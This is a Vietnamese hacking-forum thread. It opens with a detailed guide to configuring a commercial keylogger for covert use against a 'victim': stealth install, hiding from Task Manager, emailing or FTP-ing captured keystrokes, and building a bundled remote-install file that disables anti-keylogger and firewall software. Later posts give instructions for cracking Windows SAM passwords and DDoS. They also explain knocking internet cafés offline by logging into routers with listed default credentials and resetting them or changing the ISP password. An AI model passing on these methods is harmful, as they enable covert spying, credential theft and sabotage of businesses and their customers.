ta điền pass của minh chọn vào để đảm bảo chỉ có 1 mình ta có thể vào được con spy , sau khi nhập
pass vào thì nó sẽ hiện lên 1 bảng thong báo đã cài đặt pass thành công .
Sau khi cài đặt pass thành công : Sau khi cài xong pass chúng ta cần chú ý 1 phần cũng khá quan
trọng đó là fím nóng để gọi con spy(mac dinh cua no la ;Shift+Ctrl+Alt+F7)

http://www.freewebs.com/hands_at/images/007/Setup0078.jpg

Bấm vào : Advanced Option để chỉnh cấu hình & cài đặt cho mail hay Fpt :
Chọn vào những Box mình muốn nó ghi nhận :
bây giờ ta sẽ đặt tuỳ chọn cho nó ok:
- send keystroke log: gửi những hoạt động trên bàn fím (đánh dấu vào)
- send application log : gửi cho những chương trình ứng dụng đã chạy (đánh dấu vào)
- send screen s***shot log : gửi ảnh chụp màn hình về cho bạn (phần này tui khuyên không nên đánh
dấu vì nó sẽ ko gửi ảnh mà chỉ gửi link ảnh có trong máy mà thôi)
Phần này các bạn nên vào bảng giao diện tuỳ chỉnh chính , phía bên trái có biểu tượng ScreenShoots
log và File/folder log . Kích phải vào nó de vô hiệu hoá , để con spy không ghi nhận các file ảnh và
phần ghi nhận file and folder trong máy Victim , có thể tạo diều kiện cho Victim dẽ truy tìm .THực
chất hai nhiệm vụ này chúng ta không cần thiết sử dụng trong báo cáo nó gửi về ,chỉ làm cho file
kèm theo Mail dung lượng cao , dễ bị đọng lại trên server SMTP . Hiện tượng này các bạn thường
thấy có khi nó ngưng gửi mail về 8-9 tiếng đồng hồ , nhưng cũng có khi nó gửi về lien tục và trùng
lặp
- send websites log : gửi những web mà nạn nhân đã vào (đánh dấu vào)
- send files/foder log : gửi những link of của những files và thư mục mà victim đã vô (đánh dấu vào)
- send logs every: thời gian spy sẽ gửi mail 1 lần cho bạn . Nên để 2 giở là nó gửi về , vì thời gian
ngắn quá làm lượng Mail chúng ta phải mở ra để kiểm nhiều lên , không khâm nổi khi mà mồi ngày
phải mở và đọc 300 cái mail >OK. Nhưng đối với các máy có cài Deepfreeze thì ta nên để 30 đến 45
phút , vì có thể file log của ta chưa kịp gửi di thì đã bị Chủ NET Restar máy và bị biến mất
- clear all logs after deliver : xoá các logs đã gửi thành công chú ý nếu ko chon vào con spy sẽ gửi cả
log cũ và mới lẫn lộn rất khó phân biệt
xong phần cấu hình bây giờ nhấn ok là xong , tao lại trở về giao diện ban đầu:

http://www.freewebs.com/hands_at/images/007/Setup00710.jpg

Điền Địa chỉ Email của mình vào :


- your Email : điền cái mail mà bạn cần nó gửi pass về
- subject : tiêu đề thư để bạn bít đây là mail của con spy theo tui bạn nên lập riêng 1 hộp mail chỉ để
chứa pass là good nhất
- test now: để các bạn gửi thử trực tiếp về hộp mail của mình xem con spy có hoạt động good ko tui
khuyên bạn nên thử nó 2 lần, sau khi thử xong nó sẽ hịên lên một bảng thông báo đã gửi thành công .
*chú ý: cái FPT thì ban nào có sài host có hỗ trợ fpt thì sài củng giống mail nhưng điền them cái id
& pass của cái fpt vào là ok !

http://www.freewebs.com/hands_at/images/007/Setup00713.jpg
Bấm vào : Test now để kiểm tra , nếu thành công thì sẽ có bảng như sau :

http://www.freewebs.com/hands_at/images/007/Setup0079.jpg

Muốn không sử dụng chức năng gì > kích phải vào vị trí tương ứng :trong bang sau :

http://www.freewebs.com/hands_at/images/007/Setup00712.jpg

http://www.freewebs.com/hands_at/images/007/Setup007.jpg

http://www.freewebs.com/hands_at/images/007/Setup00711.jpg

===============================

Khái quát chung:[/B] cách sử dụng con này


Keylog nói chung là phần mềm ghi lại các thao tác bàn phím, đây là chức năng cơ bản của nó. Mặc
dù sau này keylog càng ngày càng có thêm nhiều chức năng hơn nhưng đây vẫn là phần nhiệm vụ cơ
bản nhất mà nó phải đảm bảo
Perfect keylog được đánh giá là 1 trong 10 keylog nguy hiểm nhất ! Nó khá hoàn hảo về các chức
năng, dễ dàng trong cài đặt và sử dụng. Hiện nay phiên bản mới nhất là 1.63 !
Hôm nay tui sẽ hướng dẫn các bạn cách sử dụng từ cơ bản nhất đến 1 số chức năng ít người khai
thác !

[B]II/ Download và cài đặt : sử dụng phiên bản 1.63, mở rộng cả 1.62

- Download Phiên bản 1.63: http://www.4shared.com/file/2495161/3db703...pk2003_163.html

Phiên bản 1.62: http://www.4shared.com/file/2495168/446bbb...pk2005_162.html

Chú ý nếu link trên die các bạn có thể tải trực tiếp từ website của keylog
http://www.blazingtools.com/

http://www.blazingtools.com/downloads/i_bpk2003.exe

- Sau khi đã download về các bạn giải nén và tiến hành cài đặt.

http://img402.imageshack.us/img402/6096/14qp.jpg
Các bạn chạy file i_ipk...exe để tiến hành cài đặt:
http://img457.imageshack.us/img457/7996/38ps1.jpg

Cái này chỉ cần next thui. Chú ý đến phần Select program Folder bạn chọn đường dẫn đến thư mục
sẽ cài đặt keylog vào. Có 2 lựa chọn cho việc cài đặt
http://img457.imageshack.us/img457/7996/38ps1.jpg
Regular installation: Cài đặt đầy đủ toàn bộ các file ( trợ giúp, remove ...)
Stealth installation: Chỉ cài các file cần thiết

Lời khuyên là bạn chỉ cần cài đặt ở chế độ Stealth installation !
Sau đó next tiếp và finish, như vậy quá trình cài đặt trên Pc đã xong. Keylog sẽ hiện lên 1 bảng
thông báo Regis minder
http://img479.imageshack.us/img479/1824/41sf.jpg
Bạn chọn phần "Enter registration code" sau đó sử dụng serial trong thư mục giải nén ban đầu để
đăng ký !
Điền vô rùi okie nó sẽ báo bạn đã đăng ký thành công, keylog thu về 1 biểu tuợng hình cuộn phim ở
khay hệ thống !
http://img504.imageshack.us/img504/7037/50rq.jpg
http://img223.imageshack.us/img223/6947/68he1.jpg

Click chuột phải vô biểu tượng của keylog trong khay hệ thống ta thấy xuất hiện 1 bảng tùy chọn
như sau:
http://img223.imageshack.us/img223/7919/75yz.jpg
View the log: xem những ghi chép của keylog đã thực hiện ở trên máy ở trên máy.
+ Enable logging : mở chức năng ghi chép ( đừng có bỏ phần đánh dấu đi làm j )
+ Hide program icon : ẩn biểu tượng của keylog ở khay hệ thống đi. Chú ý đến các phím tắt để gọi
nó trở lại nghen
+ Password : đặt pw để bảo vệ keylog !
+Remote install: tạo file cài đặt để gửi đi.
+[b] Option: Cài đặt

Trong đó option là phần quan trọng nhất, các bạn nên thiết lập đầy đủ thông tin trong option trước
khi làm bất kỳ điều gì khác ! Bắt đầu, bạn chọn phần option nó sẽ hiện lên như sau:
http://img223.imageshack.us/img223/714/81wx.jpg

General: tùy chọn chung


- System:
run on Windows startup ( tự động chạy mỗi khi win khởi động);
don't show grogram icon...( không hiển thị icon khi startup )
- Hotkey: phím nóng để gọi keylog lên trong khay hệ thống khi sử dụng chức năng tự ẩn đi của
keylog, bạn có thể thay đổi tùy ý mình sao cho dễ nhớ là được !
- Invisibility: khả năng tự ẩn của key trong task manager

Trong phần này các bạn nên để toàn bộ các chế độ trên ! Như vậy là xong 1 option là general.

Logging: Tùy chọn các chức năng ghi chép, đặt pw bảo vệ... phần này không quan trọng lắm, các bạ
tự tham khảo nếu không để mặc định cũng okie

Screenshot: Chức năng tự động chụp màn hình sau 1 khoảng thời gian ấn định sẵn, chất lượng file
hình, kiểu chụp...

Email: đây là phần quan trọng các bạn chú ý. Nó sẽ giúp gửi các thông tin ghi chép, hình ảnh chụp
được về cho chúng ta theo email ! Nhìn lên trên tui thấy có 2 tag là Scheduler và Delivery
- Delivery: cài đặt địa chỉ email. Nếu các bạn sử dụng mail server của keylog như mặc định thì chỉ
cần gõ địa chỉ email vô ô send to như vậy là được. Tuy nhiên nếu có mail server khác ổn định hơn
thì bạn có thể sử dụng mailserver này bằng cách đánh dấu vào ô Use mail acc to send email và sau
đó điền đầy đủ thông tin của mail acc vào
Lời khuyên, nếu các bạn không chắc chắn về SMTP, port .. thì tốt nhất chỉ cần điền địa chỉ email của
mình vào phần Send to thôi
Sau khi điền xong các bạn chọn Send test ! Keylog sẽ gửi 1 bức mail kiểm tra đến hòm mail bạn đã
điền. Nếu thông báo Send thành công tức là email đã được gửi đi.
Thông thường bạn nên chọn Gmail thì tốt hơn và đôi khi có thể gặp trục trặc khi không thể kết nối
được với server !
- Scheduler: Lên lịch cho keylog để gửi ghi chép về qua mail ( chú ý đánh dấu vào ô try to send
logs... ) Các tùy chọn là do bạn: thời gian gửi mỗi lần, dung lượng mail gửi đi, gửi ghi chép gồm
những gì ( hình ảnh, chat logs,...)

FTP: Đây là chức năng giúp keylog gửi ghi chép về trên host của bạn dưới dạng các file htm và file
hình ảnh ...Đây là một chức năng khá hay, tỷ lệ gửi thành công cao tuy nhiên rất ít người dùng nó.
Alex khuyến khích các bạn sử dụng cái này thay vì send email, tỷ lệ gặp trục trặc rất cao !
Yêu cầu là có 1 host hộ trợ ftp upload ! Bạn điền đầy đủ thông tin về host như hostname ( ex:
ftp://yahoo69.com )
user và pw + port để đăng nhập
Ai đã sử dụng các phần mềm ftp upload thì sẽ rõ những thông tin này thôi

Alerts: Bạn có thể tạo 1 list các ký hiệu, từ ngữ ... mà khi keylog ghi lại được nó sẽ lập tức thông báo
lại cho bạn ! <== ít xài

Targets: Mặc định là keylog sẽ ghi lại toàn bộ hoạt động, tuy nhiên bạn có thể chọn theo dõi 1 vài
chương trình nào đó bằng cách đẩy dấu chọn xuống "Enable logging in the following..." sau đó chọn
đường dẫn đến file cần theo dõi hoạt động hoặc add title của chương trình vào !

Ok, vậy là xong phần cài đặt vui vẻ nhá ! 1 phần quan trọng là remote install có lẽ phải post sau...
đêm đã về khuya ..

III/ Tạo file remote install:

Đây là chức năng cho phép bạn tạo file cài đặt và gửi đi cho victim, khi Victim download về trên
máy thì keylog sẽ tự động cài đặt trên pc của nạn nhân !

Sau khi cài đặt xong và bạn thấy keylog hoạt động ổn định, đạt yêu cầu ==> chuẩn rùi thì tạo file
remote install !

Tại biểu tượng keylog ở khay hệ thống, click chuột phải vào chọn "Remote Installation " ==> Hiện
lên bảng "Welcome to the remote installation wizard" bạn chọn next để tiếp tục !

+ "Select the pạckage actions" :

Trong phần what do you want to do ? Có 2 tùy chọn ở trên là tạo file remote để cài đặt mới keylog
trên các pc nhận file remote này, lựa chọn thứ 2 ở dưới là tạo file remote để tháo gỡ keylog đã cài
trên máy nạn nhân !
Bạn chọn ô trên để tạo file cài đặt !

Ở dưới là Notify me when the remote installation package will be launch => để dấu chọn vào đây
keylog sẽ gửi thông báo cho bạn khi đã cài đặt thành công trên pc của victim bằng email hoặc ftp !

Tùy chọn cuối cùng để file remote tự đóng các soft antikeylog, firewall,.. khi hoạt động !

chon xong bạn next để qua bước tiếp theo


+ "Specify deployment package options":

Specify the file to combine with the keylog: bạn chọn đường dẫn đến 1 file bất kỳ để kẹp chung với
keylog ( file gì cũng được )
Install to the following ...: bạn chọn đưòng dẫn đến thư mục mà keylog sẽ được install vào ( ví dụ
C:\WINDOWS )

sau rùi next và finish là xong, file remote được tạo ra có tên là inst_xxx trong đó xxx là tên file bạn
kẹp vô cùng keylog và nằm cùng thư mục với file này !

Bạn có thể upload file này len host, attack vô email để gửi đi !

Trong options chọn Email

http://img356.imageshack.us/img356/7946/11qp1.jpg
Trong phần email nhìn lên trên có 2 lựa chọn Delivery và Scheduler ! Bạn chọn Scheduler để thiết
lập các thông số về lịch trình gửi email ( chú ý đánh dấu vào ô try to send logs... )

Try to send logs by email every ...hour ...minutes <== điền thời gian gửi vào ô đó !

Bạn nên sự dụng Acc của Gmail sẽ tốt hơn Yahoo trong việc nhận mail !
Nếu có host thì nên dùng chức năng ftp thay vì email
http://www.freewebtown.com/kubachkim/i_bpk2005_162.zip
Yêu cầu bạn k0 dc giới thiệu link đến web cá nhân.Nếu còn tại phạm sẽ bị banned 7 ngày.
Ký tên :xXxHackerxXx
soulevil
09-21-2006, 01:34 PM
Cách 1: Hack Pass, có nghĩa là chôm được pass của admin or MOD và vào chọc ngoáy theo ý mình.
Có rất nhiều cách để chôm pass nhưng có một chương trình mà SV chúng ta hay sử dụng đó là
Webcrack ( Down về từ http://webcrack.home.ml.org/ )
Đừng có dùng để làm chuyện mờ ám nhé :gaicam:

Cách 2: Cách này tương tự như kiểu bomb thư mà ta hay dùng tức là làm treo Website bằng những
user ảo (có thể lên đến 10.000 ) bằng kỹ thuật Distributed Denial Of Service , Mục đích của cách này
là làm trang Web ngưng trệ trong một thời gian nhất định chứ ko thể thay đổi được nội dung Website
chứ chưa nói đến chuyện cướp domain (cùng một lúc có 10.000 người truy cập vào không treo mới
là chuyện lạ) . Các bạn có thể dùng chương trình Smurf để thực hiện...hoặc nhiều chương trình khác.

Cách 3: Hack Domain, Cách này tôi cũng chỉ mới nghe mấy tay "có máu mặt" nói chuyện (mình
chưa đủ trình độ .. hè hè) . Hình như 3 năm trước (Soulevil còn bé tí tẹo) forum Viethacker và
Hackervn oánh nhau , các hacker dùng cách này --> kết quả một bên ngỏm củ tỏi còn một bên tạm
ngưng hoạt động trong một thời gian. Bác nào biết hack bằng cách này post bài cho anh em học hỏi
đi
NHUVO
10-03-2006, 10:40 AM
vì lý do thời gian nên không post link mong các bạn thông cảm
có hai cách : cách cổ ổ xỉ là dung cd boot để lấy file sam và system trong thư mục
c\windows\system32\config nếu dùng NTFS thì dùng cd boot có hổ trợ NTFS(hireen boot 8.0 trở
lên) nhưng cach tôi chr sau đây ko cần hireen boot
ko cần vào dos :
công cụ : saminside (tìm trên gooooogle)
một chương trình phục hồi dử liệu(PHDL)
lổ hỏng của winxp à chỉ quản lí tập tin nên ta có thể tấn công vào secsion
chạy chương trìng PHDL và tim đến c\windows\system32\config và bạn sẻ phục hồi 2 file sam va
system vào ổ khác chạy saminside chọn import 2 file đó và nhấn nut play để nó phân tích :beer:
:covietnam:
azurayoyo
10-03-2006, 11:45 AM
theo tui thì dùng Hiren's Boot là hay nhất đợ rắc rối chương trình saminside mà không phân tích ra
cái gì thì thui rùi, bản mới nhất là 8.2 có nhiều chức năng mới lắm
nhưng mà cái Hiren's Boot theo mình biết thì nó xóa cả pass cũ đi đó nếu mà để hack thì cũng không
thật sự tôi iu lắm đó
nhưng mà hack là không tôt đâu nên trong sach một tí hihi...:khongduocphep:

mà sao bạn nói nhát gừng thế lần sau post bài nói cho hết cặn kẽ để anh em còn biết

à quên đây là bản saminside mình đã tìm được cho ai muốn dowload nhé
Home:
http://www.insidepro.com/

Download: 0.482 MB (APP + FIX) http://rapidshare.de/files/25271684/SAMInside.v2.5.6.2-


YAG.rar.html
Password: www.devilived.com

chúc vui vẻ
Khoa Remy
12-16-2006, 01:35 PM
:still_dreaming: Trong khi mọi người đang say sưa nghe nhạc, chơi games online. Bạn nhẹ nhàng
click chuột và thế là cả một tiệm Net chưởi gầm lên chỉ vì bị rớt mạng (tất nhiên là họ ko biết do bạn
làm đâu ). :burn_joss_stick:

++Máy tính và ISP (nhà cung cấp dịch vụ) kết nối dc với nhau là thông qua Modem, vậy nếu ta là hư
dc Modem thì dĩ nhiên, nó sẽ bị rớt mạng.

++Đầu tiên, ta cần xác định dc tên MODEM. Nếu chủ tiệm Net để MODEM cho bạn thấy rõ (trên
bàn chẳng hạn) thì thật là tuyệt.
Biết tên MODEM, chúng ta sẽ có dc username và password để truy cập vào web cấu hình MODEM
đó. Từ đó, chúng ta sẽ phá nó !!!

++Nhưng nếu chúng ta ko thấy dc MODEM thì chúng ta sẽ làm như sau:

Vào Start > Control Panel > Network Connections > nhấn dupe chuột vào Local Area Connection >
chọn Propertises > chọn Internet Protocol (TCP/IP) > Propertises > Sau đó, bạn lần lượt chọn Obtain
an IP & Obtain DNS Server .

Đến đây, bạn vào Start > Run > gõ cmd > trong màn hình DOS, bạn gõ tiếp
ipconfig > Ngay tại dòng Default Gateway sẽ hiện ra địa chỉ truy cập của MODEM, bạn hãy ghi
nhớ.
Tiếp theo, vào IE > gõ địa chỉ đó vào
VD: sau khi làm nãy giờ, tôi dc IP: 192.168.1.1 , tui vào IE vào gõ vào dãy số trên .

Sau khi gõ xong, bạn sẽ nhận dc trang web cấu hình MODEM đó. Bây giờ, bạn phải vượt qua thêm
01 ải nữa: đó là username và password truy cập MODEM.
Nếu có dc username và password, chúng ta đăng nhập vô, vậy là xong cái tiệm Net !! (^_^)
Q: Nhưng cái username và password đó tui tìm dc ở đâu ??
A:Mỗi loại modem sẽ có 01 username và password riêng, do nhà sản xuất qui định.
Ở đây, tui xin nêu ra vài loại thông dụng tại Việt Nam mình, các bạn có thể tham khảo vào thực hiện
nha .

Dòng đầu là địa chỉ truy cập, dòng 02 là username và password nha các bạn !!!
Các loại Modem:

D-Links: 192.168.1.1
Admin - Admin
Planet 10.0.0.2
Admin - epicrouter
Venr 192.168.1.1
admin - admin
Micronet 10.0.0.2
admin - conexant
Cnet 10.0.0.2
admin - epicrouter
MegaZoom 192.168.0.0
admin - admin

++Trên đây là những modem thường sử dụng tại Việt Nam, các bạn cũng lưu ý giữa chữ cái có viết
hoa & ko viết hoa nữa nha.
++Có dc địa chỉ, username và password bạn chỉ cần mỗi công việc nữa là làm rớt mạng, hãy thử
nhanh đi.

++Nếu một tiệm nào đó, ko sử dụng các modem trênm bạn thử vào http://www.cirt.net/cgi-
bin/passwd.pl để tiềm user và pass nha.
++Bước cuối:

Đã có dc tất cả, giờ chỉ cần 01 cái click chuột là tất cả sẽ "chết".
Bạn làm như sau:
---Thường thì các loại modem sẽ có 01 nút mang tên" Reset to Factory Default" , chỉ cần click vào
đó, toàn bộ tiệm sẽ "rớt" mạng.
---Nếu ko tìm thấy nút trên, bạn hãy cố tìm nút "WAN", click vào nó, sẽ hiện ra khung có username
và password của tiệm Net đó, bạn xóa dòng password đi và nhấn OK (làm như vầy, ISP sẽ ko hiểu
dc kết nối nữa => "rớt" mạng.
---Password của tiệm Net thường bị mã hóa thành ***, bạn hãy dùng chương trình Xpass để biến nó
lại bình thường.

Sau đó, lên http://user.vnn.vn > chọn mục đổi pass > bạn hãy đổi pass của nó lại (như vầy ít nhất là
01 tuần nó mới có mạng lại dc , vì Bưu điện phải yêu cầu VTC cấp pass lại , he' he' ).

Download Xpass:
http://www.esnips.com/web/WebForum?docsPage=4#files
Đến đây, là xong tất cả rùi đó, bạn hãy cố gắng giữ bình tĩnh sau khi làm nha. Ban đầu tui đổ mồ hôi
dữ lắm (vì sợ bị đập, nhưng rốt cuộc sẽ ko ai biết là bạn làm). Nhanh lên, làm ngay đi, chần chừ gì
nữa
Khoa Remy
Bão Tuyết
12-16-2006, 05:26 PM
... VD: sau khi làm nãy giờ, tôi dc IP: 192.168.1.1 , tui vào IE vào gõ vào dãy số trên .

Sau khi gõ xong, bạn sẽ nhận dc trang web cấu hình MODEM đó. Bây giờ, bạn phải vượt qua thêm
01 ải nữa: đó là username và password truy cập MODEM.
Nếu có dc username và password, chúng ta đăng nhập vô, vậy là xong cái tiệm Net !! (^_^)
Q: Nhưng cái username và password đó tui tìm dc ở đâu ??
.....................

Nên nhớ MODEM không bao giờ có IP 192.xxx.xxx.xxx , chỉ có router hoặc chính xác hơn là
routermodem mới có ip.

Những ai đã là Admin của một Network họ không bao giờ ngây ngô đến nỗi không đổi U + P cho
một router.
Hưng.MT
12-16-2006, 05:28 PM
Làm dis mạng thì đc lợi ích gì bạn.
Mà bạn cũng bị mà.
thangquygia22
12-16-2006, 06:32 PM
mình đã thử truy cập vào chỗ cmd nhưng không thấy phần dèaut Getway có gì cả
Vậy phải làm thế nào chỉ tôi với
azurayoyo
12-16-2006, 09:05 PM
trùi thế mà cũng đăng hàng net nào mà trả đổi pass của mode rùi ngồi đây

mà mò nhé còn có cả một số chương trình kiểm soắt việc truy cập nữa chứ

vd: netname, coffecafe...vv.. ngồi đó mà mò


Khoa Remy
12-16-2006, 09:24 PM
trùi thế mà cũng đăng hàng net nào mà trả đổi pass của mode rùi ngồi đây

mà mò nhé còn có cả một số chương trình kiểm soắt việc truy cập nữa chứ

vd: netname, coffecafe...vv.. ngồi đó mà mò

Nhưng thật ra rất ít tiệm nào đổi pass truy cập MODEM lắm.
Bản thân mình ban đầu cũng nghĩ vậy, nhưng khảo sát thực tế tại Vĩnh Long (10 tiệm có 9 tiệm ko
đổi pass). Và thậm chí, sau khi bị rùi, mất pass, họ vẫn ko đổi pass nữa. Trường hợp đổi pass rất ít
xảy ra (chắc có lẽ dân Vĩnh Long quá "cùi bắp")
nguyenhuuhung
12-17-2006, 05:17 PM
cho mình hỏi nhé , vao IE la vao cai giif vậy nè, xin cam ơn nhiều
acquy274
12-18-2006, 02:42 PM
Em muốn cài keylog quán này ,nhưng khi reset lại máy chủ quán biết.CÓ ai có cách cài hoặc bản
hack để hack cái ID va pass đăng nhập cho em biết với.
talama2008
12-18-2006, 03:28 PM
trời
có con keylogger mà không biết hả liên lạc với mình nghia_dia_tinh_yeu92
có khoảng tầm trên 20 con gửi về email các loại
talama2008
12-18-2006, 03:42 PM
heheh
ban ơi bạn phost bài này không được rồi
nêu như bạn nói biết dc acc và pas thì nói làm gì nữa không biết được mà phá mới siêu chứ mà ai
cho bạn biết pas đâu
mình đã thử 100% không dc
acquy274
12-19-2006, 11:11 AM
ặc tôi thiếu gì keylog ,đang hỏi cách cài quán easycafe cơ mà,CHán
Tôi có hẳn bản keylog bàn phím ảo!
net-robber
12-22-2006, 07:52 PM
Tui đã thử rùi...Thành công được 80% trên tổng số các tiệm Net ghé qua. (Đa số là xài Dlink và
Planet)
Lưu ý là tùy vào trang cấu hình của Modem có đòi hỏi Pass khi muốn làm rớt mạng hay ko(nếu nó
đòi thì pó tay) còn nếu ko thì cứ cho rớt và nhớ canh ngay cái tiệm nào chơi võ lâm hay au đông
đông ấy !
Việc soi Pass bằng Xpass thực ra ko cần thiết lắm vì chỉ cần liên lạc được với bưu điện là xong ngay,
chả có gì khó. Chúng ta chỉ "phá cho vui" thì chỉ cần làm rớt mạng đã đủ...
Bản thân tui , sau khi làm xong cũng toát mồ hôi hột đấy! (nghe tụi trong tiệm la ó như điên vậy)
bachlangtu
12-24-2006, 09:43 PM
đơn giản thôi bạn vào local area connetion sau đó vào phần support thì nó sẽ hiện phần default
gateway, khi bạn biết gateway của người ta rồi thì bạn có thể thực hiện các bước trên để phá một
tiệm net.
hungba193
12-25-2006, 11:02 AM
tìm ko ra phần đang nhập bác ơi?
bachlangtu
12-25-2006, 09:17 PM
cách này không hiệu quả bởi vì những người quản lý tiệm net chắc chắn sẽ thay đởi pass của modem
để bảo mật, vậy là pó tay bởi vì ta đâu có được **ng vào modem thì làm sao mà reset modem được,
cách này chỉ sử dụng được đối với những người quản lý thiếu kinh nghiệm thôi nên tôi thấy cách này
của bác Khoa remy là không hiệu quả.
hungba193
12-27-2006, 10:09 AM
ạc ko thấy chổ đăng nhập o đâu hết làm seo đổi pas đây ông kẹ!
taplamhacker
12-27-2006, 06:28 PM
thế 1 tiệm net mà người ta khóa chương trình cmd thì phải làm sao hã máy bác chỉ giúp em đi nào
alizwong
12-28-2006, 11:13 AM
chòy !!!
thế 1 tiệm net mà người ta khóa chương trình cmd thì phải làm sao hã máy bác chỉ giúp em đi nào
chuyện nhỏ í mà
đừng vào Run gỏ cmd nha ! vì nó khóa rùi !
Bạn vào Start >> Program File >> Accessories >> right click lên command prompt rùi chọn Run As
Rùi bỏ chọn Protect computer and data .... >> OK
Xong rùi ! bây giờ nó pó tay
taplamhacker
12-31-2006, 11:28 AM
anh cho em hỏi thằng IE nó nằm ở đâu vậy anh sao em tìm ma ko bít nó ở đau hết làm sao để tìm ra
nó được
talama2008
12-31-2006, 08:25 PM
bó tay
thứ nhất họ giấu internet bằng cách này chuột phải lên màn hình rồi chọn
Properties==>Desktop==>Customize Desktop rồi bỏ dấu Internet Explorer rồi Ok
thứ hai là họ đấu trong regedit
Hướng dẫn này sẽ giúp bạn ẩn Icon Internet Explorer trên Desktop mà không dùng bất kỳ các
phương pháp nào bạn đã biết.

Tìm đến khoá chỉ ra bên dưới trong Regsitry Editor, tạo mới một giá trị kiểu DWORD với tên
"NoInternetIcon" nếu chưa có và gán dữ liệu cho nó là 1 để ẩn Internet Explorer trên Desktop

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\


Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\
Policies\ Explorer
Name: NoInternetIcon
Type: REG_DWORD
Value: 0 - hiện, 1 - ẩn
anhbang_bn
01-01-2007, 12:04 AM
Nhưng thật ra rất ít tiệm nào đổi pass truy cập MODEM lắm.
Bản thân mình ban đầu cũng nghĩ vậy, nhưng khảo sát thực tế tại Vĩnh Long (10 tiệm có 9 tiệm ko
đổi pass). Và thậm chí, sau khi bị rùi, mất pass, họ vẫn ko đổi pass nữa. Trường hợp đổi pass rất ít
xảy ra (chắc có lẽ dân Vĩnh Long quá "cùi bắp")

tại sao mình tìm được trang web cấu hình MODEM nhưng mà nó là tiếng trung quốc mình không
hiểu bạn giúp mình cái mình tìm ra trang web cấu hình MODEM của mình là
http://192.168.1.1/hag/pages/home.htm xong rồi mình không tìm thấy pass và username nữa Dòng
đầu là địa chỉ truy cập, dòng 02 là username và password nha các bạn !!!
Các loại Modem:

D-Links: 192.168.1.1
Admin - Admin
Planet 10.0.0.2
Admin - epicrouter
Venr 192.168.1.1
admin - admin
Micronet 10.0.0.2
admin - conexant
Cnet 10.0.0.2
admin - epicrouter
MegaZoom 192.168.0.0
admin - admin
có nghĩa như thế nào vậy
azurayoyo
01-01-2007, 12:30 AM
D-Links: 192.168.1.1
Admin - Admin
Planet 10.0.0.2
Admin - epicrouter
Venr 192.168.1.1
admin - admin
Micronet 10.0.0.2
admin - conexant
Cnet 10.0.0.2
admin - epicrouter
MegaZoom 192.168.0.0
admin - admin
có nghĩa như thế nào vậy

có nghĩa là : ví dụ bạn dùng modem megazoom thì khi bạn

vào địa trỉ 192.168.0.0 thì nó sẽ yêu cầu bạn đánh ID là admin và pass là

admin đế truy cập vào phần điều khiển của modem cho phép bạn thay đổi

các thông số ví dụ như thay đổi

pass của modem

hoặc pass truy cập v..vv...

các modem khác tương tự


† HoàngMinh †
01-03-2007, 06:48 PM
Sẽ chảng đc gì vì HM cũng wan lý Net room
HM chẳng để U+P của nhà SX bao giờ :D
cách này chỉ áp dụng với những wan net trước kia k bít gì thui ^^!
dù sao cũng cảm ơn
Khoa Remy
01-05-2007, 01:32 PM
+Chả thú gì khi hack người khác và càng ko thú hơn khi bị người khác hack+ Tui nêu ra đây, chỉ
giúp anh em có thêm chút kinh nghiệm (nếu ai có phòng Net thì sẽ biết chiêu này). Bản thân tui còn
rất kém cỏi, biết dc chút gì chỉ mong hướng dẫn lại cho người mới. Ai mà ko thích biết thêm nhiều
kiến thức về IT phải ko??? Học trong trường chán bỏ xừ, lên đây góp vui cho anh em mà còn bị
chười. Dis !!!
huy_it
01-26-2007, 11:06 PM
người ta đổi pass rồi thì làm sao tìm được pass hả remy.chứ tui thấy hầu như ai cũng đổi và cách này
thì có vẻ hên xui quá,tôi chỉ muốn bít thôi ko có ý đi phá hoại đâu,thanks
jindodt
01-28-2007, 06:38 PM
anh cho em hỏi thằng IE nó nằm ở đâu vậy anh sao em tìm ma ko bít nó ở đau hết làm sao để tìm ra
nó được

bạn vào Star\Run gõ vào iexplore rồi Enter thế là vào được IE
minh27s
02-09-2007, 06:57 PM
tôi nói cho mấy bạn nghe 1 điều , làm rớt mạng lan của dv nét thì không quá khó khăn đâu làm vậy
thì ác quá chổ người ta làm ăn nếu làm vậy người ta mất khack , thì làm sao có tiền trả nhân viên , vã
lại máy con chính mình cũng rớt luôn , có ngày người ta phát hiện là đưa lên công an và ăn đòn như
chơi .Biết thêm cái này cũng hay để đề phòng lỡ nhà mình có dv net , khi ai chơi thì có thể biết mà
khắc phục , chứ đừng dùng cái này làm hoài ở dv thì không ổn đâu . Tôi sẽ đưa ra 2 cách vào thẳng
máy chủ mà khỏi cần vào Dos làm gì ... đây là trang web lưu lại toàn bộ thông số của máy chủ và ip
mạng lan ++++ và passline và nhiều thông số khác các bạn vào trang web đó và tự tìm hiểu thêm .....

http://www.hackerwhacker.com
khi bạn vào trang này rồi thấy phần free tools nhấp chuột vào đó sẽ hiện toàn bộ thông số máy chủ :
HTTP_ACCEPT What type of media your browser will accept (*/* means everthing) image/gif,
image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-
excel, application/vnd.ms-powerpoint, application/msword, */*
HTTP_ACCEPT_LANGUAGE What language your browser preferes en-us
HTTP_ACCEPT_ENCODING gzip, deflate
HTTP_USER_AGENT Your browser software Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)
HTTP_HOST The Web Site you requested upsilon.hackerwhacker.com
HTTP_X_FORWARDED_FOR 203.210.210.112
HTTP_CONNECTION Connection Control Keep-Alive
HTTP_CACHE_CONTROL Caching Parameters bypass-client=203.210.210.112
REMOTE_ADDR Your ip address 203.162.3.156 .

bạn thấy phần : bypass-client=203.210.210.112 ----> đó là chìa khóa cho bạn vào đấy . Coppy
203.210.210.112 đem ra thanh address gõ vào nếu nó vào thẳng máy chủ thì thôi còn nếu nó hiện ra
cái bản đòi pass và id admin ,
thì ở chổ ID bạn gõ : user
'' -------PASS------: pasword
bùm chéo thế là nguyên 1 cái máy chủ hiện ra trước mắt bạn liền , còn phần pass admin bạn dùng
phần mềm dịch pass ******* về sẽ rõ còn phần username thì yên tâm không bị mã hóa .

xâm nhập cách 2 : đó là bằng host qua đường chat mirc :


ai rành chat micr sẻ biết lệnh DNS là gì ...
khi bạn connec vào mirc rồi sẻ hiện ra phần host (ip) khi đó đem cái ip ra ngoài cũng gõ lên thanh
ADD: và hiện ra cái bảng đòi ID và PASS ADMIN
ta gõ : ID : user
PASS: pasword
